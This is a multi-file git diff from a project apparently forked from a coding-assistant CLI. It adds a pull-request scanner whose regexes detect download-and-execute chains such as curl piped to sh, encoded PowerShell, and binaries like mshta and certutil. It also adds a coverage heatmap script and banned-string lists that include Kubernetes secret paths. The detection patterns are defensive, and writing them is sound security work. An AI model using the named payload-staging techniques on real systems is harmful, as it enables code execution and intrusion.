const lines = diffText.split('\n')
const added: DiffLine[] = []
let currentFile: string | null = null
let currentLine = 0
for (const rawLine of lines) {
if (rawLine.startsWith('+++ b/')) {
currentFile = rawLine.slice('+++ b/'.length)
continue
}
if (rawLine.startsWith('@@')) {
const match = /\+(\d+)(?:,(\d+))?/.exec(rawLine)
if (match) {
currentLine = Number(match[1])
}
continue
}
if (!currentFile) {
continue
}
if (rawLine.startsWith('+') && !rawLine.startsWith('+++')) {
added.push({
file: currentFile,
line: currentLine,
content: rawLine.slice(1),
})
currentLine += 1
continue
}
if (rawLine.startsWith('-') && !rawLine.startsWith('---')) {
continue
}
if (!rawLine.startsWith('\\')) {
currentLine += 1
}
}
return added
}
function tryParseUrl(value: string): URL | null {
try {
return new URL(value)
} catch {
return null
}
}
function hostMatches(hostname: string, domain: string): boolean {
return hostname === domain || hostname.endsWith(`.${domain}`)
}
function hasSuspiciousDownloadIndicators(url: URL): boolean {
const combined = `${url.pathname}${url.search}`.toLowerCase()
return (
combined.includes('dl=1') ||
combined.includes('raw=1') ||
combined.includes('export=download') ||
combined.includes('/download') ||
combined.includes('/uc?export=download')
)
}
function findUrlFindings(line: DiffLine): Finding[] {
const findings: Finding[] = []
const matches = line.content.match(URL_REGEX) ?? []
for (const match of matches) {
const parsed = tryParseUrl(match)
if (!parsed) continue
const hostname = parsed.hostname.toLowerCase()
for (const domain of SHORTENER_DOMAINS) {
if (hostMatches(hostname, domain)) {
findings.push({
severity: 'medium',
code: 'shortened-url',
file: line.file,
line: line.line,
detail: `Added shortened URL: ${hostname}`,
excerpt: trimExcerpt(line.content),
})
}
}
const isSuspiciousHost = SUSPICIOUS_DOWNLOAD_DOMAINS.some(domain =>
hostMatches(hostname, domain),
)
const isExecutableDownload = EXECUTABLE_PATH_REGEX.test(
`${parsed.pathname}${parsed.search}`,
)
if (isSuspiciousHost) {
findings.push({
severity:
hasSuspiciousDownloadIndicators(parsed) || isExecutableDownload
? 'high'
: 'medium',
code: 'suspicious-download-link',
file: line.file,
line: line.line,
detail: `Added external file-hosting link: ${hostname}`,
excerpt: trimExcerpt(line.content),
})
} else if (isExecutableDownload) {
findings.push({
severity: 'high',
code: 'executable-download-link',
file: line.file,
line: line.line,
detail: `Added direct link to executable or archive payload: ${hostname}`,
excerpt: trimExcerpt(line.content),
})
}
}
return findings
}
function findSensitivePathFindings(line: DiffLine): Finding[] {
if (!SENSITIVE_PATH_REGEX.test(line.file)) {
return []
}
const lower = line.content.toLowerCase()
if (
/\b(curl|wget|invoke-webrequest|iwr|powershell|bash|sh|chmod\s+\+x)\b/i.test(
line.content,
) ||
URL_REGEX.test(line.content) ||
lower.includes('download')
) {
return [
{
severity: 'medium',
code: 'sensitive-automation-change',
file: line.file,
line: line.line,
detail:
'Added network, execution, or download-related content in a sensitive automation file',
excerpt: trimExcerpt(line.content),
},
]
}
return []
}
function findCommandFindings(line: DiffLine): Finding[] {
const findings: Finding[] = []
const lower = line.content.toLowerCase()
const highPatterns: Array<[string, RegExp, string]> = [
[
'download-exec-chain',
/\b(curl|wget|invoke-webrequest|iwr)\b.*(\|\s*(sh|bash|zsh)|;\s*chmod\s+\+x|&&\s*\.\.?\/|>\s*\/tmp\/)/i,
'Added remote download followed by execution or staging',
],
[
'powershell-encoded',
/\bpowershell(?:\.exe)?\b.*(?:-enc|-encodedcommand)\b/i,
'Added encoded PowerShell invocation',
],
[
'shell-eval-remote',
/\b(curl|wget)\b.*\|\s*(sh|bash|zsh)\b/i,
'Added shell pipe from remote content into interpreter',
],
[
'binary-lolbin',
/\b(mshta|rundll32|regsvr32|certutil)\b/i,
'Added living-off-the-land binary often used for payload staging',
],
[
'invoke-expression',
/\b(iex|invoke-expression)\b/i,
'Added PowerShell expression execution',
],
]
const mediumPatterns: Array<[string, RegExp, string]> = [
[
'download-command',
/\b(curl|wget|invoke-webrequest|iwr)\b.*https?:\/\//i,
'Added command that downloads remote content',
],
[
'archive-extract-exec',
/\b(unzip|tar|7z)\b.*(&&|;).*\b(chmod|node|python|bash|sh)\b/i,
'Added archive extraction followed by execution',
],
[
'base64-decode',
/\b(base64\s+-d|openssl\s+base64\s+-d|python .*b64decode)\b/i,
'Added explicit payload decode step',
],
]
for (const [code, pattern, detail] of highPatterns) {
if (pattern.test(line.content)) {
findings.push({
severity: 'high',
code,
file: line.file,
line: line.line,
detail,
excerpt: trimExcerpt(line.content),
})
}
}
for (const [code, pattern, detail] of mediumPatterns) {
if (code === 'download-command' && !SENSITIVE_PATH_REGEX.test(line.file)) {
continue
}
if (pattern.test(line.content)) {
findings.push({
severity: 'medium',
code,
file: line.file,
line: line.line,
detail,
excerpt: trimExcerpt(line.content),
})
}
}
if (LONG_BASE64_REGEX.test(line.content) && !lower.includes('sha256') && !lower.includes('sha512')) {
findings.push({
severity: 'medium',
code: 'long-encoded-payload',
file: line.file,
line: line.line,
detail: 'Added long encoded blob or token-like payload',
excerpt: trimExcerpt(line.content),
})
}
return findings
}
export function scanAddedLines(lines: DiffLine[]): Finding[] {
const findings = lines
.filter(line => !SELF_EXCLUDED_FILES.has(line.file))
.flatMap(line => [
...findUrlFindings(line),
...findCommandFindings(line),
...findSensitivePathFindings(line),
])
return uniqueFindings(findings)
}
export function getGitDiff(baseRef: string): string {
const mergeBase = spawnSync('git', ['merge-base', baseRef, 'HEAD'], {
encoding: 'utf8',
})
if (mergeBase.status !== 0) {
throw new Error(
`Could not determine merge-base with ${baseRef}: ${mergeBase.stderr.trim() || mergeBase.stdout.trim()}`,
)
}
const base = mergeBase.stdout.trim()
const diff = spawnSync(
'git',
['diff', '--unified=0', '--no-ext-diff', `${base}...HEAD`],
{ encoding: 'utf8' },
)
if (diff.status !== 0) {
throw new Error(`git diff failed: ${diff.stderr.trim() || diff.stdout.trim()}`)
}
return diff.stdout
}
function shouldFail(findings: Finding[], failOn: FindingSeverity): boolean {
if (failOn === 'medium') {
return findings.length > 0
}
return findings.some(finding => finding.severity === 'high')
}
function renderText(findings: Finding[]): string {
if (findings.length === 0) {
return 'PR intent scan: no suspicious additions found.'
}
const high = findings.filter(f => f.severity === 'high')
const medium = findings.filter(f => f.severity === 'medium')
const lines = [
`PR intent scan: ${findings.length} finding(s)`,
`- high: ${high.length}`,
`- medium: ${medium.length}`,
'',
]
for (const finding of findings) {
lines.push(
`[${finding.severity.toUpperCase()}] ${finding.file}:${finding.line} ${finding.detail}`,
)
lines.push(` ${finding.excerpt}`)
}
return lines.join('\n')
}
export function run(options: CliOptions): number {
const diff = getGitDiff(options.baseRef)
const addedLines = parseAddedLines(diff)
const findings = scanAddedLines(addedLines)
if (options.json) {
process.stdout.write(
`${JSON.stringify(
{
baseRef: options.baseRef,
addedLines: addedLines.length,
findings,
},
null,
2,
)}\n`,
)
} else {
process.stdout.write(`${renderText(findings)}\n`)
}
return shouldFail(findings, options.failOn) ? 1 : 0
}
if (import.meta.main) {
const options = parseOptions(process.argv.slice(2))
process.exitCode = run(options)
}

View File

@@ -0,0 +1,393 @@
import { mkdir, readFile, writeFile } from 'fs/promises'
import { dirname, resolve } from 'path'
type FileCoverage = {
path: string
found: number
hit: number
chunks: number[]
}
type DirectoryCoverage = {
path: string
found: number
hit: number
}
const LCOV_PATH = resolve(process.cwd(), 'coverage/lcov.info')
const HTML_PATH = resolve(process.cwd(), 'coverage/index.html')
const CHUNK_COUNT = 20
function escapeHtml(value: string): string {
return value
.replaceAll('&', '&amp;')
.replaceAll('<', '&lt;')
.replaceAll('>', '&gt;')
.replaceAll('"', '&quot;')
}
function bucketColor(ratio: number): string {
if (ratio >= 0.9) return '#166534'
if (ratio >= 0.75) return '#15803d'
if (ratio >= 0.5) return '#65a30d'
if (ratio > 0) return '#a3a3a3'
return '#262626'
}
function coverageLabel(ratio: number): string {
return `${Math.round(ratio * 100)}%`
}
function coverageRatio(found: number, hit: number): number {
return found === 0 ? 0 : hit / found
}
function bucketGlyph(ratio: number): string {
if (ratio >= 0.9) return '█'
if (ratio >= 0.75) return '▓'
if (ratio >= 0.5) return '▒'
if (ratio > 0) return '░'
return '·'
}
function terminalBar(chunks: number[]): string {
return chunks.map(bucketGlyph).join('')
}
function summarizeDirectories(files: FileCoverage[]): DirectoryCoverage[] {
const dirs = new Map<string, DirectoryCoverage>()
for (const file of files) {
const dir =
file.path.includes('/') ? file.path.slice(0, file.path.lastIndexOf('/')) : '.'
const current = dirs.get(dir) ?? { path: dir, found: 0, hit: 0 }
current.found += file.found
current.hit += file.hit
dirs.set(dir, current)
}
return [...dirs.values()].sort((a, b) => {
const left = coverageRatio(a.found, a.hit)
const right = coverageRatio(b.found, b.hit)
if (right !== left) return right - left
return b.found - a.found
})
}
function buildTerminalReport(files: FileCoverage[]): string {
const totalFound = files.reduce((sum, file) => sum + file.found, 0)
const totalHit = files.reduce((sum, file) => sum + file.hit, 0)
const totalRatio = coverageRatio(totalFound, totalHit)
const overallChunks = new Array(CHUNK_COUNT).fill(totalRatio)
const topDirectories = summarizeDirectories(files)
.filter(dir => dir.found > 0)
.slice(0, 8)
const lowestFiles = [...files]
.filter(file => file.found >= 20)
.sort((a, b) => {
const left = coverageRatio(a.found, a.hit)
const right = coverageRatio(b.found, b.hit)
if (left !== right) return left - right
return b.found - a.found
})
.slice(0, 10)
const lines = [
'',
'Coverage Activity',
`${terminalBar(overallChunks)} ${coverageLabel(totalRatio)} ${totalHit}/${totalFound} lines ${files.length} files`,
'',
'Top Directories',
]
for (const dir of topDirectories) {
const ratio = coverageRatio(dir.found, dir.hit)
lines.push(
`${terminalBar(new Array(12).fill(ratio))} ${coverageLabel(ratio).padStart(4)} ${String(dir.hit).padStart(5)}/${String(dir.found).padEnd(5)} ${dir.path}`,
)
}
lines.push('', 'Lowest Coverage Files')
for (const file of lowestFiles) {
const ratio = coverageRatio(file.found, file.hit)
lines.push(
`${terminalBar(file.chunks).padEnd(CHUNK_COUNT)} ${coverageLabel(ratio).padStart(4)} ${String(file.hit).padStart(5)}/${String(file.found).padEnd(5)} ${file.path}`,
)
}
lines.push('', `HTML report: ${HTML_PATH}`)
return lines.join('\n')
}
function parseLcov(content: string): FileCoverage[] {
const files: FileCoverage[] = []
const sections = content.split('end_of_record')
for (const rawSection of sections) {
const section = rawSection.trim()
if (!section) continue
const lines = section.split('\n')
let filePath = ''
const lineHits = new Map<number, number>()
for (const line of lines) {
if (line.startsWith('SF:')) {
filePath = line.slice(3).trim()
} else if (line.startsWith('DA:')) {
const [lineNumberText, hitText] = line.slice(3).split(',')
const lineNumber = Number(lineNumberText)
const hits = Number(hitText)
if (Number.isFinite(lineNumber) && Number.isFinite(hits)) {
lineHits.set(lineNumber, hits)
}
}
}
if (!filePath || lineHits.size === 0) continue
const ordered = [...lineHits.entries()].sort((a, b) => a[0] - b[0])
const found = ordered.length
const hit = ordered.filter(([, hits]) => hits > 0).length
const chunkSize = Math.max(1, Math.ceil(found / CHUNK_COUNT))
const chunks: number[] = []
for (let index = 0; index < found; index += chunkSize) {
const slice = ordered.slice(index, index + chunkSize)
const covered = slice.filter(([, hits]) => hits > 0).length
chunks.push(slice.length === 0 ? 0 : covered / slice.length)
}
while (chunks.length < CHUNK_COUNT) {
chunks.push(0)
}
files.push({
path: filePath,
found,
hit,
chunks: chunks.slice(0, CHUNK_COUNT),
})
}
return files.sort((a, b) => {
const left = a.found === 0 ? 0 : a.hit / a.found
const right = b.found === 0 ? 0 : b.hit / b.found
if (right !== left) return right - left
return a.path.localeCompare(b.path)
})
}
function buildHtml(files: FileCoverage[]): string {
const totalFound = files.reduce((sum, file) => sum + file.found, 0)
const totalHit = files.reduce((sum, file) => sum + file.hit, 0)
const totalRatio = totalFound === 0 ? 0 : totalHit / totalFound
const cards = [
['Files', String(files.length)],
['Covered Lines', `${totalHit}/${totalFound}`],
['Line Coverage', coverageLabel(totalRatio)],
]
const rows = files
.map(file => {
const ratio = file.found === 0 ? 0 : file.hit / file.found
const squares = file.chunks
.map(
(chunk, index) =>
`<span class="cell" title="Chunk ${index + 1}: ${coverageLabel(chunk)}" style="background:${bucketColor(chunk)}"></span>`,
)
.join('')
return `
<tr>
<td class="file">${escapeHtml(file.path)}</td>
<td class="percent">${coverageLabel(ratio)}</td>
<td class="lines">${file.hit}/${file.found}</td>
<td class="heatmap">${squares}</td>
</tr>
`
})
.join('')
const summary = cards
.map(
([label, value]) => `
<div class="card">
<div class="card-label">${escapeHtml(label)}</div>
<div class="card-value">${escapeHtml(value)}</div>
</div>
`,
)
.join('')
return `<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<title>OpenClaude Coverage</title>
<style>
:root {
color-scheme: dark;
--bg: #09090b;
--panel: #111113;
--panel-2: #18181b;
--border: #27272a;
--text: #fafafa;
--muted: #a1a1aa;
}
* { box-sizing: border-box; }
body {
margin: 0;
background: linear-gradient(180deg, #09090b 0%, #0f0f12 100%);
color: var(--text);
font: 14px/1.4 ui-monospace, SFMono-Regular, Menlo, monospace;
}
main {
max-width: 1440px;
margin: 0 auto;
padding: 32px 24px 48px;
}
h1 {
margin: 0 0 8px;
font-size: 32px;
letter-spacing: -0.04em;
}
p {
margin: 0;
color: var(--muted);
}
.summary {
display: grid;
grid-template-columns: repeat(3, minmax(0, 1fr));
gap: 12px;
margin: 24px 0;
}
.card {
background: rgba(24, 24, 27, 0.92);
border: 1px solid var(--border);
border-radius: 16px;
padding: 16px 18px;
}
.card-label {
color: var(--muted);
margin-bottom: 8px;
}
.card-value {
font-size: 28px;
font-weight: 700;
}
.table-wrap {
background: rgba(17, 17, 19, 0.94);
border: 1px solid var(--border);
border-radius: 18px;
overflow: hidden;
}
table {
width: 100%;
border-collapse: collapse;
}
thead th {
text-align: left;
color: var(--muted);
font-weight: 500;
background: rgba(24, 24, 27, 0.95);
border-bottom: 1px solid var(--border);
}
th, td {
padding: 12px 16px;
vertical-align: middle;
}
tbody tr + tr td {
border-top: 1px solid rgba(39, 39, 42, 0.65);
}
.file {
width: 48%;
word-break: break-all;
}
.percent, .lines {
white-space: nowrap;
}
.heatmap {
width: 32%;
min-width: 280px;
}
.cell {
display: inline-block;
width: 12px;
height: 12px;
margin-right: 4px;
border-radius: 3px;
border: 1px solid rgba(255,255,255,0.05);
}
.legend {
display: flex;
align-items: center;
gap: 10px;
margin-top: 16px;
color: var(--muted);
}
.legend-scale {
display: flex;
gap: 4px;
}
@media (max-width: 900px) {
.summary {
grid-template-columns: 1fr;
}
.heatmap {
min-width: 220px;
}
th, td {
padding: 10px 12px;
}
}
</style>
</head>
<body>
<main>
<h1>Coverage Activity</h1>
<p>Git-style heatmap generated from coverage/lcov.info</p>
<section class="summary">${summary}</section>
<section class="table-wrap">
<table>
<thead>
<tr>
<th>File</th>
<th>Coverage</th>
<th>Lines</th>
<th>Activity</th>
</tr>
</thead>
<tbody>${rows}</tbody>
</table>
</section>
<div class="legend">
<span>Less</span>
<div class="legend-scale">
<span class="cell" style="background:#262626"></span>
<span class="cell" style="background:#a3a3a3"></span>
<span class="cell" style="background:#65a30d"></span>
<span class="cell" style="background:#15803d"></span>
<span class="cell" style="background:#166534"></span>
</div>
<span>More</span>
</div>
</main>
</body>
</html>`
}
async function main() {
const content = await readFile(LCOV_PATH, 'utf8')
const files = parseLcov(content)
const html = buildHtml(files)
await mkdir(dirname(HTML_PATH), { recursive: true })
await writeFile(HTML_PATH, html, 'utf8')
console.log(buildTerminalReport(files))
console.log(`coverage heatmap written to ${HTML_PATH}`)
}
await main()

View File

@@ -19,6 +19,10 @@ BANNED=(
"/var/run/secrets/kubernetes" "/var/run/secrets/kubernetes"
"/proc/self/mountinfo" "/proc/self/mountinfo"
"tengu_internal_record_permission_context" "tengu_internal_record_permission_context"
"anthropic-serve"
"infra.ant.dev"
"claude-code-feedback"
"C07VBSHV7EV"
) )
echo "Checking $DIST for banned patterns..." echo "Checking $DIST for banned patterns..."

View File

@@ -9,6 +9,10 @@ const BANNED_PATTERNS = [
'/var/run/secrets/kubernetes', '/var/run/secrets/kubernetes',
'/proc/self/mountinfo', '/proc/self/mountinfo',
'tengu_internal_record_permission_context', 'tengu_internal_record_permission_context',
'anthropic-serve',
'infra.ant.dev',
'claude-code-feedback',
'C07VBSHV7EV',
] as const ] as const
if (!existsSync(DIST)) { if (!existsSync(DIST)) {

View File

@@ -112,7 +112,7 @@ type State = {
agentColorIndex: number agentColorIndex: number
// Last API request for bug reports // Last API request for bug reports
lastAPIRequest: Omit<BetaMessageStreamParams, 'messages'> | null lastAPIRequest: Omit<BetaMessageStreamParams, 'messages'> | null
// Messages from the last API request (ant-only; reference, not clone). // Messages from the last API request (internal-only; reference, not clone).
// Captures the exact post-compaction, CLAUDE.md-injected message set sent // Captures the exact post-compaction, CLAUDE.md-injected message set sent
// to the API so /share's serialized_conversation.json reflects reality. // to the API so /share's serialized_conversation.json reflects reality.
lastAPIRequestMessages: BetaMessageStreamParams['messages'] | null lastAPIRequestMessages: BetaMessageStreamParams['messages'] | null
@@ -185,7 +185,7 @@ type State = {
agentId: string | null agentId: string | null
} }
> >
// Track slow operations for dev bar display (ant-only) // Track slow operations for dev bar display (internal-only)
slowOperations: Array<{ slowOperations: Array<{
operation: string operation: string
durationMs: number durationMs: number
@@ -1756,3 +1756,12 @@ export function setPromptId(id: string | null): void {
STATE.promptId = id STATE.promptId = id
} }
// Stub for feature-gated REPL bridge (not available in open build)
export function isReplBridgeActive(): boolean {
return false
}
export function getReplBridgeHandle(): null {
return null
}

View File

@@ -1,11 +1,11 @@
/** /**
* Shared bridge auth/URL resolution. Consolidates the ant-only * Shared bridge auth/URL resolution. Consolidates the internal-only
* CLAUDE_BRIDGE_* dev overrides that were previously copy-pasted across * CLAUDE_BRIDGE_* dev overrides that were previously copy-pasted across
* a dozen files — inboundAttachments, BriefTool/upload, bridgeMain, * a dozen files — inboundAttachments, BriefTool/upload, bridgeMain,
* initReplBridge, remoteBridgeCore, daemon workers, /rename, * initReplBridge, remoteBridgeCore, daemon workers, /rename,
* /remote-control. * /remote-control.
* *
* Two layers: *Override() returns the ant-only env var (or undefined); * Two layers: *Override() returns the internal-only env var (or undefined);
* the non-Override versions fall through to the real OAuth store/config. * the non-Override versions fall through to the real OAuth store/config.
* Callers that compose with a different auth source (e.g. daemon workers * Callers that compose with a different auth source (e.g. daemon workers
* using IPC auth) use the Override getters directly. * using IPC auth) use the Override getters directly.

View File

@@ -174,7 +174,7 @@ export function checkBridgeMinVersion(): string | null {
/** /**
* Default for remoteControlAtStartup when the user hasn't explicitly set it. * Default for remoteControlAtStartup when the user hasn't explicitly set it.
* When the CCR_AUTO_CONNECT build flag is present (ant-only) and the * When the CCR_AUTO_CONNECT build flag is present (internal-only) and the
* tengu_cobalt_harbor GrowthBook gate is on, all sessions connect to CCR by * tengu_cobalt_harbor GrowthBook gate is on, all sessions connect to CCR by
* default — the user can still opt out by setting remoteControlAtStartup=false * default — the user can still opt out by setting remoteControlAtStartup=false
* in config (explicit settings always win over this default). * in config (explicit settings always win over this default).

View File

@@ -1520,7 +1520,7 @@ export async function runBridgeLoop(
// Skip when the loop exited fatally (env expired, auth failed, give-up) — // Skip when the loop exited fatally (env expired, auth failed, give-up) —
// resume is impossible in those cases and the message would contradict the // resume is impossible in those cases and the message would contradict the
// error already printed. // error already printed.
// feature('KAIROS') gate: --session-id is ant-only; without the gate, // feature('KAIROS') gate: --session-id is internal-only; without the gate,
// revert to the pre-PR behavior (archive + deregister on every shutdown). // revert to the pre-PR behavior (archive + deregister on every shutdown).
if ( if (
feature('KAIROS') && feature('KAIROS') &&
@@ -1888,7 +1888,7 @@ export function parseArgs(args: string[]): ParsedArgs {
async function printHelp(): Promise<void> { async function printHelp(): Promise<void> {
// Use EXTERNAL_PERMISSION_MODES for help text — internal modes (bubble) // Use EXTERNAL_PERMISSION_MODES for help text — internal modes (bubble)
// are ant-only and auto is feature-gated; they're still accepted by validation. // are internal-only and auto is feature-gated; they're still accepted by validation.
const { EXTERNAL_PERMISSION_MODES } = await import('../types/permissions.js') const { EXTERNAL_PERMISSION_MODES } = await import('../types/permissions.js')
const modes = EXTERNAL_PERMISSION_MODES.join(', ') const modes = EXTERNAL_PERMISSION_MODES.join(', ')
const showServer = await isMultiSessionSpawnEnabled() const showServer = await isMultiSessionSpawnEnabled()
@@ -2356,7 +2356,7 @@ export async function bridgeMain(args: string[]): Promise<void> {
// environment_id and reuse that for registration (idempotent on the // environment_id and reuse that for registration (idempotent on the
// backend). Left undefined otherwise — the backend rejects // backend). Left undefined otherwise — the backend rejects
// client-generated UUIDs and will allocate a fresh environment. // client-generated UUIDs and will allocate a fresh environment.
// feature('KAIROS') gate: --session-id is ant-only; parseArgs already // feature('KAIROS') gate: --session-id is internal-only; parseArgs already
// rejects the flag when the gate is off, so resumeSessionId is always // rejects the flag when the gate is off, so resumeSessionId is always
// undefined here in external builds — this guard is for tree-shaking. // undefined here in external builds — this guard is for tree-shaking.
let reuseEnvironmentId: string | undefined let reuseEnvironmentId: string | undefined

View File

@@ -223,7 +223,7 @@ export function createBridgeLogger(options: {
if (process.env.USER_TYPE === 'ant' && debugLogPath) { if (process.env.USER_TYPE === 'ant' && debugLogPath) {
writeStatus( writeStatus(
`${chalk.yellow('[ANT-ONLY] Logs:')} ${chalk.dim(debugLogPath)}\n`, `${chalk.yellow('[internal] Logs:')} ${chalk.dim(debugLogPath)}\n`,
) )
} }
writeStatus(`${indicatorColor(indicator)} ${stateText}${suffix}\n`) writeStatus(`${indicatorColor(indicator)} ${stateText}${suffix}\n`)

View File

@@ -161,7 +161,7 @@ export async function initReplBridge(
return null return null
} }
// When CLAUDE_BRIDGE_OAUTH_TOKEN is set (ant-only local dev), the bridge // When CLAUDE_BRIDGE_OAUTH_TOKEN is set (internal-only local dev), the bridge
// uses that token directly via getBridgeAccessToken() — keychain state is // uses that token directly via getBridgeAccessToken() — keychain state is
// irrelevant. Skip 2b/2c to preserve that decoupling: an expired keychain // irrelevant. Skip 2b/2c to preserve that decoupling: an expired keychain
// token shouldn't block a bridge connection that doesn't use it. // token shouldn't block a bridge connection that doesn't use it.

View File

@@ -1,4 +1,4 @@
// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered // biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
/** /**
* Env-less Remote Control bridge core. * Env-less Remote Control bridge core.
* *

View File

@@ -1,4 +1,4 @@
// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered // biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
import { randomUUID } from 'crypto' import { randomUUID } from 'crypto'
import { import {
createBridgeApiClient, createBridgeApiClient,

View File

@@ -17,7 +17,7 @@ import { jsonStringify } from '../utils/slowOperations.js'
* *
* Bridge sessions have SecurityTier=ELEVATED on the server (CCR v2). * Bridge sessions have SecurityTier=ELEVATED on the server (CCR v2).
* The server gates ConnectBridgeWorker on its own flag * The server gates ConnectBridgeWorker on its own flag
* (sessions_elevated_auth_enforcement in Anthropic Main); this CLI-side * (sessions_elevated_auth_enforcement in the server-side main deployment); this CLI-side
* flag controls whether the CLI sends X-Trusted-Device-Token at all. * flag controls whether the CLI sends X-Trusted-Device-Token at all.
* Two flags so rollout can be staged: flip CLI-side first (headers * Two flags so rollout can be staged: flip CLI-side first (headers
* start flowing, server still no-ops), then flip server-side. * start flowing, server still no-ops), then flip server-side.

File diff suppressed because one or more lines are too long

3
src/buddy/feature.ts Normal file
View File

@@ -0,0 +1,3 @@
export function isBuddyEnabled(): boolean {
return true
}

65
src/buddy/observer.ts Normal file
View File

@@ -0,0 +1,65 @@
import type { Message } from '../types/message.js'
import { getGlobalConfig } from '../utils/config.js'
import { getUserMessageText } from '../utils/messages.js'
import { getCompanion } from './companion.js'
const DIRECT_REPLIES = [
'I am observing.',
'I am helping from the corner.',
'I saw that.',
'Still here.',
'Watching closely.',
] as const
const PET_REPLIES = [
'happy chirp',
'tiny victory dance',
'quietly approves',
'wiggles with joy',
'looks pleased',
] as const
function hashString(s: string): number {
let h = 2166136261
for (let i = 0; i < s.length; i++) {
h ^= s.charCodeAt(i)
h = Math.imul(h, 16777619)
}
return h >>> 0
}
function pickDeterministic<T>(items: readonly T[], seed: string): T {
return items[hashString(seed) % items.length]!
}
export async function fireCompanionObserver(
messages: Message[],
onReaction: (reaction: string | undefined) => void,
): Promise<void> {
const companion = getCompanion()
if (!companion || getGlobalConfig().companionMuted) return
const lastUser = [...messages].reverse().find(msg => msg.type === 'user')
if (!lastUser) return
const text = getUserMessageText(lastUser)?.trim()
if (!text) return
const lower = text.toLowerCase()
const companionName = companion.name.toLowerCase()
if (lower.includes('/buddy')) {
onReaction(pickDeterministic(PET_REPLIES, text + companion.name))
return
}
if (
lower.includes(companionName) ||
lower.includes('buddy') ||
lower.includes('companion')
) {
onReaction(
`${companion.name}: ${pickDeterministic(DIRECT_REPLIES, text + companion.personality)}`,
)
}
}

View File

@@ -1,8 +1,8 @@
import { feature } from 'bun:bundle'
import type { Message } from '../types/message.js' import type { Message } from '../types/message.js'
import type { Attachment } from '../utils/attachments.js' import type { Attachment } from '../utils/attachments.js'
import { getGlobalConfig } from '../utils/config.js' import { getGlobalConfig } from '../utils/config.js'
import { getCompanion } from './companion.js' import { getCompanion } from './companion.js'
import { isBuddyEnabled } from './feature.js'
export function companionIntroText(name: string, species: string): string { export function companionIntroText(name: string, species: string): string {
return `# Companion return `# Companion
@@ -15,7 +15,7 @@ When the user addresses ${name} directly (by name), its bubble will answer. Your
export function getCompanionIntroAttachment( export function getCompanionIntroAttachment(
messages: Message[] | undefined, messages: Message[] | undefined,
): Attachment[] { ): Attachment[] {
if (!feature('BUDDY')) return [] if (!isBuddyEnabled()) return []
const companion = getCompanion() const companion = getCompanion()
if (!companion || getGlobalConfig().companionMuted) return [] if (!companion || getGlobalConfig().companionMuted) return []

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@@ -1,4 +1,4 @@
// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered // biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
import { feature } from 'bun:bundle' import { feature } from 'bun:bundle'
import { readFile, stat } from 'fs/promises' import { readFile, stat } from 'fs/promises'
import { dirname } from 'path' import { dirname } from 'path'
@@ -2829,7 +2829,7 @@ function runHeadlessStreaming(
if (message.type === 'control_request') { if (message.type === 'control_request') {
if (message.request.subtype === 'interrupt') { if (message.request.subtype === 'interrupt') {
// Track escapes for attribution (ant-only feature) // Track escapes for attribution (internal-only feature)
if (feature('COMMIT_ATTRIBUTION')) { if (feature('COMMIT_ATTRIBUTION')) {
setAppState(prev => ({ setAppState(prev => ({
...prev, ...prev,
@@ -3765,7 +3765,7 @@ function runHeadlessStreaming(
...getSettingsWithSources(), ...getSettingsWithSources(),
applied: { applied: {
model, model,
// Numeric effort (ant-only) → null; SDK schema is string-level only. // Numeric effort (internal-only) → null; SDK schema is string-level only.
effort: typeof effort === 'string' ? effort : null, effort: typeof effort === 'string' ? effort : null,
}, },
}) })
@@ -5025,7 +5025,7 @@ async function loadInitialMessages(
} }
// Handle resume in print mode (accepts session ID or URL) // Handle resume in print mode (accepts session ID or URL)
// URLs are [ANT-ONLY] // URLs are [internal-only]
if (options.resume) { if (options.resume) {
try { try {
logEvent('tengu_resume_print', {}) logEvent('tengu_resume_print', {})

View File

@@ -30,7 +30,7 @@ import { getInitialSettings } from 'src/utils/settings/settings.js'
export async function update() { export async function update() {
// Block updates for third-party providers. The update mechanism downloads // Block updates for third-party providers. The update mechanism downloads
// from Anthropic's distribution bucket, which would silently replace the // from the first-party distribution bucket, which would silently replace the
// OpenClaude build (with the OpenAI shim) with the upstream Claude Code // OpenClaude build (with the OpenAI shim) with the upstream Claude Code
// binary (without it). // binary (without it).
if (getAPIProvider() !== 'firstParty') { if (getAPIProvider() !== 'firstParty') {

View File

@@ -1,4 +1,4 @@
// biome-ignore-all assist/source/organizeImports: ANT-ONLY import markers must not be reordered // biome-ignore-all assist/source/organizeImports: internal-only import markers must not be reordered
import addDir from './commands/add-dir/index.js' import addDir from './commands/add-dir/index.js'
import autofixPr from './commands/autofix-pr/index.js' import autofixPr from './commands/autofix-pr/index.js'
import backfillSessions from './commands/backfill-sessions/index.js' import backfillSessions from './commands/backfill-sessions/index.js'
@@ -59,6 +59,7 @@ import usage from './commands/usage/index.js'
import theme from './commands/theme/index.js' import theme from './commands/theme/index.js'
import vim from './commands/vim/index.js' import vim from './commands/vim/index.js'
import { feature } from 'bun:bundle' import { feature } from 'bun:bundle'
import { isBuddyEnabled } from './buddy/feature.js'
// Dead code elimination: conditional imports // Dead code elimination: conditional imports
/* eslint-disable @typescript-eslint/no-require-imports */ /* eslint-disable @typescript-eslint/no-require-imports */
const proactive = const proactive =
@@ -117,7 +118,7 @@ const forkCmd = feature('FORK_SUBAGENT')
require('./commands/fork/index.js') as typeof import('./commands/fork/index.js') require('./commands/fork/index.js') as typeof import('./commands/fork/index.js')
).default ).default
: null : null
const buddy = feature('BUDDY') const buddy = isBuddyEnabled()
? ( ? (
require('./commands/buddy/index.js') as typeof import('./commands/buddy/index.js') require('./commands/buddy/index.js') as typeof import('./commands/buddy/index.js')
).default ).default

File diff suppressed because one or more lines are too long

View File

@@ -9,4 +9,3 @@ export async function call(onDone: LocalJSXCommandOnDone, context: ToolUseContex
const tools = getTools(permissionContext); const tools = getTools(permissionContext);
return <AgentsMenu tools={tools} onExit={onDone} />; return <AgentsMenu tools={tools} onExit={onDone} />;
} }
